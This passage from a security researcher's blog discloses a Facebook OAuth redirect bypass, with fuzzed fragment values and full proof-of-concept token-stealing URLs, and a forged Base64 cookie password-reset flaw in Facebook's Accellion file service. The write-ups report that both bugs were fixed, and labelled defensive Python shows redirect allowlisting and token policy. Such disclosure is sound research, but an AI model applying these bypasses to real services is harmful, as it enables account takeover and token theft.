I found that if you use a subdomain, for example <a href="http://xxx.facebook.com/" target="_blank">xxx.facebook.com</a>, Facebook will allow this action.</div><div style="direction: ltr;">But if you try to access folders / files in <a href="http://xxx.facebook.com/" target="_blank">x.facebook.com (x.facebook.com/xx/x.php)</a>, Facebook blocks you.</div><div style="direction: ltr;">So I noticed that <a href="http://facebook.com/" target="_blank">facebook.com</a> uses a hash sign and ! in its URLs (<a href="http://x.facebook.com/#%21/xxxx" target="_blank">x.facebook.com/#!/xxxx</a>).</div><div style="direction: ltr;">I tried to perform this action in the next parameter (next=<a href="http://x.facebook.com/%23%21/" target="_blank">x.facebook.com/%23!/</a>), and Facebook blocked me again!</div><div style="direction: ltr;">Then I tried to put "something" between the hash sign and the ! (%23x!), and Facebook didn't block this action.</div><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;"></span><span style="font-family: arial,sans-serif; font-size: 13px;">Seems that there is a Reg-ex protection, Cool!,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<span style="font-size: large;"><span style="font-family: arial,sans-serif;">But wait!,</span></span><br />
<br />
</div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">If we put something like this (</span><a href="https://beta.facebook.com/#xxx%21/messages/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">https://beta.facebook.com/#xxx!/messages/</a><span style="font-family: arial,sans-serif; font-size: 13px;">), the client will not treat it the same as #! and will not redirect us to the messages screen,</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">I figured I had to find a way around it, so I started to fuzz characters between # and ! so that any browser (IE, Chrome, Safari, Firefox...) would treat it like #!,</span><br />
</div><div style="direction: ltr;"><b><span style="font-family: arial,sans-serif; font-size: 13px;">Now it's time for fuzzing!,</span></b><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<u><b><span style="font-family: arial,sans-serif; font-size: 13px;">Result:</span></b></u><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">%23~! (Works on all browsers)</span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">%23%09! (Works on all browsers)</span><br />
</div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Cool! This trick works on </span><b><a href="http://touch.facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">touch.facebook.com/#%09!/</a><span style="font-family: arial,sans-serif; font-size: 13px;">, </span><a href="http://m.facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">m.facebook.com/#~!/</a></b><span style="font-family: arial,sans-serif; font-size: 13px;"> <b>(or any other Facebook mobile or touch domain)</b>,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span> <span style="font-family: arial,sans-serif; font-size: 13px;"><br />
</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">So now I'm able to redirect the victim to any file or directory in any Facebook sub-domain,</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Then I created a Facebook application that redirects the victim to an external website, in order to send the victim's access_token to my "malicious" external website,</span></div><div style="direction: ltr;"><br />
<u><b><span style="font-family: arial,sans-serif; font-size: 13px;">For Example: (Zynga Texas Holdem OAuth Bypass):</span></b></u></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<a href="https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=https%3A%2F%2Ftouch.facebook.com%2F%23%7E%21%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">https://www.facebook.com/<wbr></wbr>connect/uiserver.php?app_id=<wbr></wbr>2389801228&next=https%3A%<wbr></wbr>2F%2Ftouch.facebook.com%2F%23~<wbr></wbr>!%2Fapps%2Ftestestestte%2F&<wbr></wbr>display=page&fbconnect=1&<wbr></wbr>method=permissions.request&<wbr></wbr>response_type=token</a><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;">The next parameter redirects to my Facebook application (touch.facebook.com/apps/testestestte),</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">And my Facebook application redirects to the </span><a href="http://files.nirgoldshlager.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">files.nirgoldshlager.com</a><span style="font-family: arial,sans-serif; font-size: 13px;"> domain and saves the victim's access_token in a log file (files.nirgoldshlager.com/log.txt),</span><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Amazing! Now I'm able to steal the access tokens of any Facebook application,</span><br />
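The check the next parameter ran into above, as an added example that is not part of the original post: a Python model of a blocklist-style filter next to an allowlist validator. weak_is_allowed() is a hypothetical reconstruction of the behaviour described (it is not Facebook's real filter), the sample URLs are the ones from the post, and the set of registered targets is constructed.<br />

```python
"""Checking an OAuth redirect target ('next'): blocklist regex vs allowlist.

Added example, not Facebook's code. weak_is_allowed() is a hypothetical
reconstruction of the kind of blocklist check the post describes;
strict_is_allowed() is the defensive alternative. The sample URLs are the
ones from the post; the set of registered targets is constructed.
"""
from urllib.parse import unquote, urlsplit

# Constructed: the exact redirect targets a client has registered.
REGISTERED_TARGETS = frozenset({
    "https://touch.facebook.com/",
    "https://www.facebook.com/",
})


def weak_is_allowed(next_url: str) -> bool:
    """Blocklist style: decode, then look for the things known to be bad.

    Any *.facebook.com host is fine at its root; deeper paths and the "#!"
    pair are refused. Whatever the rules did not anticipate slips through.
    """
    url = unquote(next_url)
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not host.endswith(".facebook.com"):
        return False
    if parts.path not in ("", "/"):      # e.g. /xx/x.php is refused
        return False
    if "#!" in url:                      # the client-side route marker
        return False
    return True                          # "#~!" and "#<tab>!" are not "#!"...


def strict_is_allowed(next_url: str, registered=REGISTERED_TARGETS) -> bool:
    """Allowlist style: the parsed target must equal a registered one.

    - https only, and no userinfo or port in the authority
    - no query and above all no fragment: on a fragment-routed site the
      fragment *is* the destination, so it is never accepted from a request
    - no percent-escapes in the path: registered targets contain none, so an
      escaped "#", "/", tab or anything else can only be there to smuggle structure
    """
    parts = urlsplit(next_url)
    if parts.scheme != "https" or parts.fragment or parts.query:
        return False
    try:
        if parts.username or parts.password or parts.port is not None:
            return False
    except ValueError:                   # non-numeric port
        return False
    host = parts.hostname
    if not host:
        return False
    path = parts.path or "/"
    if "%" in path:
        return False
    return f"https://{host}{path}" in registered


if __name__ == "__main__":
    # The values the post tried, plus two classic parser tricks.
    samples = [
        "https://xxx.facebook.com/",
        "https://x.facebook.com/xx/x.php",
        "https://x.facebook.com/%23!/",
        "https://x.facebook.com/%23x!/",
        "https://touch.facebook.com/%23~!/apps/testestestte/",
        "https://touch.facebook.com/%23%09!/",
        "https://touch.facebook.com/",
        "https://touch.facebook.com@evil.example/",
    ]
    for s in samples:
        print(f"{s:55} blocklist={weak_is_allowed(s)!s:5} allowlist={strict_is_allowed(s)}")
```

With response_type=token the access_token is returned in the URL fragment, and a browser keeps that fragment across a 3xx redirect whose Location has no fragment of its own (RFC 7231, section 7.1.2); that is why a redirect target which itself forwards to another site carries the token along. The allowlist check needs no rule per variant: it never decodes the path and never accepts a fragment at all, so %23~! and %23%09! fail the same way %23! does.<br />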
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-size: x-large;"><b><span style="font-family: arial,sans-serif;">But wait!!!,</span> </b></span><br />
<br />
<br />
</div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-size: large;"><u><b>HERE COMES THE REAL DEAL: </b></u></span></div><div style="direction: ltr;"><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">To make a successful attack, the victim needs to use a Facebook application (Texas Holdem Poker, Diamond Dash, etc.),</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">And these applications only have basic permissions. We can always change the scope of the application's permissions and request new ones, but this method is not powerful, because the victim needs to accept the new permissions of the app (<a href="https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=http://zynga.com&display=page&fbconnect=1&method=permissions.request&response_type=token&perms=ads_management%20create_event%20create_note%20email%20export_stream%20manage_friendlists%20manage_groups%20manage_notifications%20manage_pages%20offline_access%20photo_upload%20publish_actions%20publish_checkins%20publish_stream%20read_friendlists%20read_insights%20read_mailbox%20read_page_mailboxes%20read_requests%20read_stream%20rsvp_event%20share_item%20sms%20status_update%20video_upload%20xmpp_login">https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=http://zynga.com&display=page&fbconnect=1&method=permissions.request&response_type=token&perms=ads_management%20create_event%20create_note%20email%20export_stream%20manage_friendlists%20manage_groups%20manage_notifications%20manage_pages%20offline_access%20photo_upload%20publish_actions%20publish_checkins%20publish_stream%20read_friendlists%20read_insights%20read_mailbox%20read_page_mailboxes%20read_requests</a>),</span><br />
<br />
<br />
</div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjql4qXofb-K180xXXGLbtXZwcg3vAGEBBOm34jqsOEglhsY5YeCjGIhDEdcrG-vqwzgtGbpaaMwrIDmwddPkCsZWifkX5KbCQMRA_xVu3swj9X8kVs8QUc-jF1BoLhVMrySD5Pdy-Ue2o/s1600/allowthisaction.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjql4qXofb-K180xXXGLbtXZwcg3vAGEBBOm34jqsOEglhsY5YeCjGIhDEdcrG-vqwzgtGbpaaMwrIDmwddPkCsZWifkX5KbCQMRA_xVu3swj9X8kVs8QUc-jF1BoLhVMrySD5Pdy-Ue2o/s320/allowthisaction.jpg" width="320" /></a></div><br style="font-family: arial,sans-serif; font-size: 13px;" /></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<br />
<span style="font-size: x-large;"><b><span style="font-family: arial,sans-serif;">I wanted something more powerful!,</span></b></span><br />
<br />
</div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Something that would give me full permissions (read inbox, outbox, manage pages, manage ads, access to private photos, videos, etc.) on the victim's account without any application installed on the victim's side, and make Facebook do the Goldshake ;),</span><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;">So I started thinking:</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">How can this be done?,</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">What if I use a different app_id? The app_id of Facebook Messenger, for example,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Does the user need to accept the Facebook Messenger app in his Facebook account?,</span></div><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"><b><span style="font-size: small;">The answer is no</span></b>,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">There are built-in applications in Facebook that users never need to accept, and these applications have full control over your account,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Also I found that this access_token never expires for Facebook Messenger,</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiXuRvLEbvOcgyC6uQ_sLkM-mDeF9fseZI_52ogLHofRiwNbiHSN8mQasfGyYH5WGm-66y4a-wHDJNSNAEeMPxbamTVdIAI7MVUBcIXhGH9A3HOZ__OcpOQxeAUscUpa2hsCrouMDbxuE/s1600/expiresscopes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiXuRvLEbvOcgyC6uQ_sLkM-mDeF9fseZI_52ogLHofRiwNbiHSN8mQasfGyYH5WGm-66y4a-wHDJNSNAEeMPxbamTVdIAI7MVUBcIXhGH9A3HOZ__OcpOQxeAUscUpa2hsCrouMDbxuE/s320/expiresscopes.jpg" width="320" /></a></div><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Only after the victim changes his password will the access_token expire, but why the hell would the user change his password?,</span><br />
<br />
<u><b><span style="font-family: arial,sans-serif; font-size: 13px;">PoC (works on all browsers, no installed application needed on the victim's account):</span></b></u><br />
<br />
<a href="https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23%7E%21%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">https://www.facebook.com/<wbr></wbr>connect/uiserver.php?app_id=<wbr></wbr>220764691281998&next=https%3A%<wbr></wbr>2F%2Ftouch.facebook.com%2F%23~<wbr></wbr>!%2Fapps%2Ftestestestte%2F&<wbr></wbr>display=page&fbconnect=1&<wbr></wbr>method=permissions.request&<wbr></wbr>response_type=token</a><br />
<br />
<b>Facebook Security Fixed this bug</b> <br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <u><b><span style="font-family: arial,sans-serif; font-size: 13px;">Full list of permissions of the Facebook Messenger app:</span></b></u><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;">ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login</span><br />
<br />
<b><span style="font-family: arial,sans-serif; font-size: 13px;">Also works on accounts with 2-step verification: when it comes to the access_token, 2-step verification will fail.</span></b><br />
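What an authorization server has to enforce so that a built-in, pre-approved app_id cannot be turned against its own users, as an added example (not Facebook's code): consent for third-party clients, a scope ceiling per client, no implicit grant for first-party clients, exact redirect binding, and tokens that expire on their own and die on a password change. The client records, scope names and URLs are constructed.<br />

```python
"""Authorization-server issuance policy: consent, scope cap, expiry and
redirect binding per client.

Added example, not Facebook's code. The client records, scope names and
URLs below are constructed for illustration.
"""
import secrets
import time
from dataclasses import dataclass


class ConsentRequired(Exception):
    """A third-party client asked for scopes the user has not approved."""


@dataclass(frozen=True)
class Client:
    client_id: str
    registered_redirects: frozenset   # exact redirect URIs, compared verbatim
    allowed_scopes: frozenset         # hard ceiling, whatever a request asks for
    first_party: bool = False         # pre-authorised app: no consent screen


@dataclass
class Token:
    value: str
    user: str
    client_id: str
    scopes: frozenset
    issued_at: float
    expires_at: float


class TokenIssuer:
    def __init__(self, clients, ttl_seconds=3600, now=time.time):
        self._clients = {c.client_id: c for c in clients}
        self._ttl = ttl_seconds
        self._now = now
        self._consents = {}         # (user, client_id) -> frozenset of approved scopes
        self._revoked_before = {}   # user -> instant; tokens issued at or before it are dead

    def record_consent(self, user, client_id, scopes):
        key = (user, client_id)
        self._consents[key] = self._consents.get(key, frozenset()) | frozenset(scopes)

    def authorize(self, user, client_id, redirect_uri, requested_scopes, response_type="code"):
        client = self._clients.get(client_id)
        if client is None:
            raise PermissionError("unknown client_id")
        # 1. The token may only travel to a redirect target the client registered.
        if redirect_uri not in client.registered_redirects:
            raise PermissionError("redirect_uri is not registered for this client")
        requested = frozenset(requested_scopes)
        # 2. No request may exceed the client's own ceiling.
        if not requested <= client.allowed_scopes:
            raise PermissionError("requested scope exceeds the client's allowed scopes")
        if client.first_party:
            # 3. A pre-authorised app skips the consent screen, so its token must
            #    never be exposed in a browser-visible fragment: no implicit grant.
            if response_type == "token":
                raise PermissionError("first-party clients may not use the implicit grant")
        else:
            consented = self._consents.get((user, client_id), frozenset())
            if not requested <= consented:
                raise ConsentRequired(sorted(requested - consented))
        # 4. Every token expires on its own; nothing waits for a password change.
        now = self._now()
        return Token(secrets.token_urlsafe(32), user, client_id, requested, now, now + self._ttl)

    def revoke_all(self, user):
        """Password change or account recovery: every token issued so far dies."""
        self._revoked_before[user] = self._now()

    def is_valid(self, token):
        if self._now() >= token.expires_at:
            return False
        return token.issued_at > self._revoked_before.get(token.user, float("-inf"))


def attempt(issuer, *args, **kwargs):
    """Run authorize() and hand back either the Token or the policy exception."""
    try:
        return issuer.authorize(*args, **kwargs)
    except (PermissionError, ConsentRequired) as exc:
        return exc


# Constructed sample clients: a third-party game and a first-party messenger.
GAME = Client("game", frozenset({"https://game.example/oauth/callback"}),
              frozenset({"basic_info", "email"}))
MESSENGER = Client("messenger", frozenset({"https://messenger.example/app"}),
                   frozenset({"basic_info", "email", "read_mailbox", "manage_pages", "publish_stream"}),
                   first_party=True)
```

attempt() exists so the policy outcomes can be inspected as values. The redirect check here is an exact string comparison against what the client registered, which only holds up if the URL was parsed and normalized before it got this far.<br />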
<br />
<span style="font-family: arial,sans-serif; font-size: large;">And???,</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFlngGnC2OsjDHvro-f1qowsX-IkwlpvnQzhsC7zJ7mbA46I42qMlWmFLktcMV2YQrDa4JuzWrEHvG5ewrLYWXfHMr9AaHtquVxbjApBFLihlcusasphlBm0AN3Wvw2IpKkQX2O6u_LoM/s1600/Mario+game+Over.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFlngGnC2OsjDHvro-f1qowsX-IkwlpvnQzhsC7zJ7mbA46I42qMlWmFLktcMV2YQrDa4JuzWrEHvG5ewrLYWXfHMr9AaHtquVxbjApBFLihlcusasphlBm0AN3Wvw2IpKkQX2O6u_LoM/s320/Mario+game+Over.jpg" width="256" /></a></div><br />
<br />
<span style="font-size: large;"><u><b><span style="font-family: arial,sans-serif;">PoC Video:</span></b></u></span><br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="281" mozallowfullscreen="" src="http://player.vimeo.com/video/60324292" webkitallowfullscreen="" width="500"></iframe> <br />
<a href="http://vimeo.com/60324292">How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account</a> from <a href="http://vimeo.com/user16651044">Nir</a> on <a href="http://vimeo.com/">Vimeo</a>.<br />
<br />
<br />
Cya Next time!,<br />
<br />
<br />
<br /><u><b>How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com)</b></u> (2013-01-07)<div dir="ltr" style="text-align: left;" trbidi="on"><br />
Hi,<br />
<br />
I want to share my finding regarding a password reset logic flaw in Facebook's Secure File Transfer service for employees.<br />
<br />
Sometimes when you add a new security measure (such as Secure File Transfer by Accellion), you may unintentionally expose your organization to this kind of risk.<br />
<br />
First of all,<br />
<br />
If you look at https://files.fb.com, you can see that this service belongs to Accellion (<a href="http://www.accellion.com/solutions/secure-file-transfer">http://www.accellion.com/solutions/secure-file-transfer</a>),<br />
<br />
Now, to test a password reset logic flaw, we need an account to test the password reset with, right?,<br />
<br />
It seems that Facebook was trying to prevent the creation of accounts in Accellion by removing the registration form from the page view,<br />
<br />
I discovered that if you know the direct location of the form (/courier/web/1000@/wmReg.html), you can easily bypass that protection and create an account in files.fb.com,<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRNaZqZgqQNhp_cZqhCTx65d0CrodFnVfd338VJf1k4BaOQ-3tBkVDTc9U_M9twnySIeLT7RWam2JBMGnmEGOCY-Jhnna8MmwasyzRFIgD2hJDUoScGNeRST9T4bgsddGPTPu-BeOUPH8/s1600/createaccount.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRNaZqZgqQNhp_cZqhCTx65d0CrodFnVfd338VJf1k4BaOQ-3tBkVDTc9U_M9twnySIeLT7RWam2JBMGnmEGOCY-Jhnna8MmwasyzRFIgD2hJDUoScGNeRST9T4bgsddGPTPu-BeOUPH8/s320/createaccount.jpg" width="320" /></a></div><br />
<br />
Now this vulnerability has been fixed and you can't open a new account in files.fb.com. Fixed:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuLsLzWonAzZC3yrjJBdsEbsyRl17K9DjMSEu6WfucrnKKrMzvrWN3Gzt7OuF4opcPA0LlCjNKTEPkGrvE8N_r_e1uVYvG8T7TjpuCD6RVsLA5HF6ypM1scoTIz7jOYvc6lXACWYwYYr8/s1600/create+account+fixed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuLsLzWonAzZC3yrjJBdsEbsyRl17K9DjMSEu6WfucrnKKrMzvrWN3Gzt7OuF4opcPA0LlCjNKTEPkGrvE8N_r_e1uVYvG8T7TjpuCD6RVsLA5HF6ypM1scoTIz7jOYvc6lXACWYwYYr8/s320/create+account+fixed.jpg" width="320" /></a></div><br />
<br />
OK, so now we have a new account in files.fb.com, right? Cool!,<br />
The next step was to download the 45-day trial of the Accellion Secure File Sharing service (<a href="http://www.accellion.com/trial-demo">http://www.accellion.com/trial-demo</a>), <br />
<br />
<br />
I realized that there are two kinds of trial versions of Accellion,<br />
<br />
<b>1.</b> Free 45 Day Cloud Hosted Trial (5 users) <br />
<br />
<b>2.</b> Free 45 Day Virtual Trial (5 users) <br />
<br />
So I chose the VM (virtual) trial, just to get all the files and source code of this Accellion application,<br />
<br />
The "bad news" was that the VM trial has a protection and you can't access the files through the VM version,<br />
<br />
Anyway, you can bypass it by mounting the virtual drive on a second Linux machine,<br />
This made it possible to get all the file names and folders of Accellion Secure File Transfer,<br />
<br />
Accellion encrypts the content of their source files (PHP) using the ionCube PHP Encoder (<a href="http://www.ioncube.com/sa_encoder.php">http://www.ioncube.com/sa_encoder.php</a>).<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWay0Nrn5cuNHO-WJtAm3e1jUhqmHFecwNoS_e172cLyd-BjAlX4WvjTSDe4WW5VbnSXt18oOwOX-nAIFG-XX1uQ9YsoekFRJCHlaFNCrb8Pefk73ZFaqL3EFaPT5OgLOtMGtmNy9WQ8/s1600/ioncube.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWay0Nrn5cuNHO-WJtAm3e1jUhqmHFecwNoS_e172cLyd-BjAlX4WvjTSDe4WW5VbnSXt18oOwOX-nAIFG-XX1uQ9YsoekFRJCHlaFNCrb8Pefk73ZFaqL3EFaPT5OgLOtMGtmNy9WQ8/s320/ioncube.jpg" width="320" /></a></div><br />
<br />
With some older versions of ionCube you can decrypt these "encrypted" files:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxAgCZA3odwuoRIiOJUTh2n9brJDxpHU_-bkW9RyqzWEMDg1lLagmz5vQ_yYdNt80wlP81yoccD1-7vLq0DRWfPZDgN-tniCYwPxpThfLqbv8tFQu5AmoPbskuz-g9_9npKaeFNcJT5To/s1600/EncryptSourceCodepassowrdupdateform.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxAgCZA3odwuoRIiOJUTh2n9brJDxpHU_-bkW9RyqzWEMDg1lLagmz5vQ_yYdNt80wlP81yoccD1-7vLq0DRWfPZDgN-tniCYwPxpThfLqbv8tFQu5AmoPbskuz-g9_9npKaeFNcJT5To/s320/EncryptSourceCodepassowrdupdateform.jpg" width="320" /></a></div><br />
<br />
Bad news again! This version of ionCube was not vulnerable to decryption. I was disappointed, because if I had the source I had the core.<br />
<br />
This could have helped me find more cool issues such as command execution, local file inclusion, etc.,<br />
<br />
Anyway, I dropped this subject and kept my research going,<br />
<br />
I found this interesting file called wmPassupdate.html,<br />
<br />
This file is used for password recovery in Accellion Secure File Transfer,<br />
<br />
I realized that there is another parameter in the cookie when you try to recover your password in wmPassupdate.html,<br />
<br />
This parameter is called referer. I found that the value of this parameter uses Base64 encoding. Wtf? I didn't think Base64 (as "encryption") was still alive these days. Yes, it appears so :),<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn0fG6HuRSqq36Ru2NqUhQlNDS3Bs8urp0FQiyTs3vIpC9qA6Z_AsroTphBO58LbtUVcA3BiGAesJmBNhK83BZ947XShXDq9MYn-cXPCqKrahs0aTbvZ4qh9jaxyvrA3QC7ROyYOi-1wo/s1600/passwordreset+via+referer+base64,+email.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn0fG6HuRSqq36Ru2NqUhQlNDS3Bs8urp0FQiyTs3vIpC9qA6Z_AsroTphBO58LbtUVcA3BiGAesJmBNhK83BZ947XShXDq9MYn-cXPCqKrahs0aTbvZ4qh9jaxyvrA3QC7ROyYOi-1wo/s320/passwordreset+via+referer+base64,+email.jpg" width="320" /></a></div><br />
<br />
So I decoded the Base64 value, and the decoded data appeared to be my email address ("dbeckyxx@gmail.com"). Cool! I started to delete all the "junk" unneeded cookie parameters and kept only the referer parameter,<br />
<br />
I Base64-encoded a different email address of my test account in files.fb.com, and then copied it into the referer cookie parameter,<br />
<br />
Then I changed the email address parameter in my POST request to the victim's email account and changed pass1 and pass2 to my chosen password,<br />
<br />
<br />
And<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGtWlYC4qk_uaUHddpZZiigiveaO5BPUz2_UaCVbRiqQwK240VZYTrjVblVx3dUksz1td1Q-Ivd8fX4afBzWuD_mCMFk00bS2sf6syF-XXtAMq4J3fadjGbVtwryGkePRtPV5BKvXOjSQ/s1600/gameover-black.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGtWlYC4qk_uaUHddpZZiigiveaO5BPUz2_UaCVbRiqQwK240VZYTrjVblVx3dUksz1td1Q-Ivd8fX4afBzWuD_mCMFk00bS2sf6syF-XXtAMq4J3fadjGbVtwryGkePRtPV5BKvXOjSQ/s320/gameover-black.gif" width="320" /></a></div><br />
<br />
PoC Image:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXMasMz9ZRG_EogLwBjUPRodf2MHlq8s3yeR8_jGiWxcPKR_n2MsKYgTp9uwQsQpgeNl1CCAsL8O1KMCgC0R7t7o1_9ogslJaYaWHkAj7MobXnD3SsiFRaWmFyGXy623_E4g7Sk621_ko/s1600/passwordreset+via+referer+base64%252C+email.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXMasMz9ZRG_EogLwBjUPRodf2MHlq8s3yeR8_jGiWxcPKR_n2MsKYgTp9uwQsQpgeNl1CCAsL8O1KMCgC0R7t7o1_9ogslJaYaWHkAj7MobXnD3SsiFRaWmFyGXy623_E4g7Sk621_ko/s320/passwordreset+via+referer+base64%252C+email.jpg" width="320" /></a></div><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi29CqtTMVaWT_EbgtGXYOlJc07gtFMyuif2-9F8Rjsqeav_t7pygmd231tzQAa0fVVxXXvqSF7XbYjbjjNXpcl6s_qUNJ-EFjo1-NUz1JrqyNSDwM9qZZ1z3LBksBldDcmOOzX-AkpVHE/s1600/wmpassupdatefixed+by+adding+a+token.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;">wmpassupdatefixed by adding a token.jpg</a></div><br />
PoC Video:<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/gFKPP5K1aVw?feature=player_embedded' frameborder='0'></iframe></div><br />Facebook and Accellion fixed these issues. I also reported 20+ different bugs in the Accellion Secure File Transfer service, and they fixed all of them :) Soon I will publish an OAuth bypass in Facebook.com, Cya Next time!, </div><br /><br /><u><b>Another Stored XSS in Facebook.com</b></u> (2013-01-03)<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="rtl"><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Another Stored XSS in Facebook.com, Another 3500$ Bounty</span></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Hi,</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">I want to share my Stored XSS finding in <a href="http://facebook.com/" target="_blank">facebook.com</a>,</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span><br />
